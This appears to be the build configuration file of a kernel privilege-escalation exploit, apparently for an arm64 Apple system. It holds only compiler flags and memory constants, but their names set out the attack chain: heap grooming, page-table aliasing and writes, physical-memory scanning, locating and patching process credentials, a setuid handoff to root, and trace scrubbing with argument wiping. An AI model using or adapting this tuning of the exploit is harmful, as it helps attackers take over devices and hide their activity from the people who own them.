PAGES       = 1024
TARGET_MAPS = 2
SR_MAL_MAP  = '( 0x180000000 + $(PAGES)*0x4000*$(TARGET_MAPS) )'
TARGET_SIZE = '( $(PAGES)*0x4000 )'

OTHER_CFLAGS = $(inherited) -DSTART_OFFSET=0x8000 '-DVALUE_ADD=(0ULL-0x4000ULL)' -DALT_START_OFFSET=0 \
-DALT_START_MODE=0 -DTHREE_PAGE_COVER=0 -DGROOM_PAIRS=0 -DKEEP_PATTERN=0 -DACTIVE_START_PERIOD=1 \
-DACTIVE_START_PHASE=0 -DACTIVE_START_FIRST=0 -DACTIVE_START_LAST=0xffff -DPTE_ENTRY_INDEX=0 \
-DPTE_DISTANCE_PAGES=2 -DSR_MAL_MAP=$(SR_MAL_MAP) -DPAGE_STARTS_COUNT=$(PAGES) -DALL_STARTS=1 \
-DTARGET_TOUCH_PAGES=0 -DRUNTIME_HELPER=0 -DPREFLT_ASCENDING=0 -DTARGET_SIZE=$(TARGET_SIZE) \
-DTARGET_MAPS=$(TARGET_MAPS) -DTARGET_FAULT_MAPS=0 -DTARGET_NOAUTH=0 -DTARGET_SPLIT_FILES=0 \
-DORACLE_SCAN_AFTER_EACH_MAP=1 -DPREFLT_PAGES=$(PAGES) -DORACLE_REGIONS=2048 -DORACLE_TRACK_PAGES=4 \
-DORACLE_WITH_HOLES=1 -DORACLE_HOLE_PAGES=2 -DORACLE_DEFER_HOLE_FREE=1 -DORACLE_HOLE_FREE_ORDER=1 \
-DORACLE_BEFORE_SETUP=0 -DORACLE_EXTRA_PAGE_INDEX=0xffff -DORACLE_PTE_SCAN=1 -DORACLE_PTE_SCAN_WORDS=64 \
-DORACLE_PTE_WRITE_ALIAS=1 -DORACLE_PTE_WRITE_SRC_INDEX=1 -DORACLE_PTE_WRITE_DST_INDEX=2 \
-DORACLE_PTE_EXISTING_ALIAS_SCAN=1 -DORACLE_PTE_EXISTING_ALIAS_ALLOW_SELF=1 -DORACLE_PTE_OWNER_RESTORE_DST=1 \
-DORACLE_PTE_OWNER_MAP_TEST=1 -DORACLE_PTE_OWNER_MAP_INDEX=3 -DORACLE_PTE_PHYS_SCAN=1 \
-DORACLE_PTE_ALIAS_WRITE_LIMIT=16 -DORACLE_PTE_PHYS_SCAN_WINDOW_STRIDE=0x2000000ULL \
-DORACLE_PTE_PHYS_SCAN_BASE=0x80000000ULL -DORACLE_PTE_PHYS_SCAN_PAGES=2044 -DORACLE_PTE_PHYS_SCAN_CHUNKS=256 \
-DORACLE_PTE_PHYS_SCAN_RESTORE=1 -DORACLE_PTE_PHYS_SCAN_REVERSE=0 -DORACLE_PTE_PHYS_SCAN_DUMP=0 \
-DORACLE_PTE_PHYS_SCAN_SEARCH_WORD=0 -DORACLE_PTE_PHYS_CRED_SCAN=1 -DORACLE_PTE_PHYS_CRED_ANY_GID=1 \
-DORACLE_PTE_PHYS_CRED_PATCH=1 -DORACLE_PTE_PHYS_CRED_RESTORE_MISS=1 -DORACLE_PTE_PHYS_CRED_MAX_PATCH=256 \
-DORACLE_PTE_PHYS_SCRUB=1 '-DORACLE_PTE_PHYS_SCRUB_VALUE=(0ULL-0x4000ULL)' \
-DSUID_HANDOFF=1 -DORACLE_STOP_AFTER_ROOT_HIT=1 \
-DORACLE_PTE_OWNER_MAP_RESTORE=1 -DORACLE_ROOT_PROOF=1 -DORACLE_EXIT_AFTER_ROOT_PROOF=0 \
-DSURVIVE_LOOP=1 -DABORT_ON_SETUP_FAIL=1 -DWIPE_ARGV_STRINGS=1
